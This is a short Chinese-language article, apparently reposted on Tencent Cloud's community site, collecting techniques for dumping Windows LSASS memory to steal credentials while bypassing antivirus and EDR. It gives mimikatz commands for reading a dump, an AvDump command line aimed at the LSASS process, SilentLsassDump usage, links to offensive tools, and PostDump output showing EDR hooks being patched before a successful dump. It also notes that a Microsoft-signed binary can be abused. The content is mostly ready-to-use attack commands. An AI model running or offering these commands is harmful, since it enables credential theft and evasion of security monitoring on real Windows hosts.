Dump LSASS SKill
文章前言
获取Windows用户的凭证信息是渗透过程中至关重要的一步,如果没有杀软,那么只要有权限想怎么读就怎么读,当有杀软时就得用一些特别的技巧,本篇文章将简单介绍几种之前在Twitter上看到的小技巧,仅供大家参考
LOLBIN
文件路径(需要下载最新版本的VS2022):
C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions证书说明:微软签名
转储实践:
之后使用mimikatz查看dump.txt:
sekurlsa::minidump "c:\users\mr.d0x\downloads\dump.txt"
sekurlsa::logonpasswords
AvDump
文件下载(安全性自查):
https://github.com/f1tz/Misc/blob/9c41db77e41d42146467516ca865313f810c44f3/AvDump/x86/AvDump.exe
转储命令:
.\AvDump.exe --pid 704 --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file lsass.dmp
SilentLsassDump
项目地址:
https://github.com/guervild/BOFs/tree/dev/SilentLsassDump
silentLsassDump <LSASS PID>
PostDump
项目地址:
https://github.com/post-cyberlabs/Offensive_tools/tree/main/PostDump
项目介绍:PostDump是由COS团队(网络攻击和安全)开发的C#工具,它使用几种技术绕过EDR Hook和lsass保护来执行内存转储(lsass)
项目使用:
C:\Temp>PostDump.exe
[*] NtReadVirtualMemory: HOOKED! Patching...
[*] NtReadVirtualMemory --> NOT Hooked!
[*] NtOpenProcess: NOT Hooked!
[*] Real Process Handle: 728
[*] PssCaptureSnapshot: NOT Hooked!
[*] Snapshot succeed! Duplicate handle: 1549097566208
[*] MiniDumpWriteDump: NOT Hooked!
[*] Duplicate dump successful. Dumped 49737034 bytes to: c:\Temp\yolo.log本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-07-01,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
相关产品与服务
对象存储
对象存储(Cloud Object Storage,COS)是由腾讯云推出的无目录层次结构、无数据格式限制,可容纳海量数据且支持 HTTP/HTTPS 协议访问的分布式存储服务。腾讯云 COS 的存储桶空间无容量上限,无需分区管理,适用于 CDN 数据分发、数据万象处理或大数据计算与分析的数据湖等多种场景。
腾讯云开发者
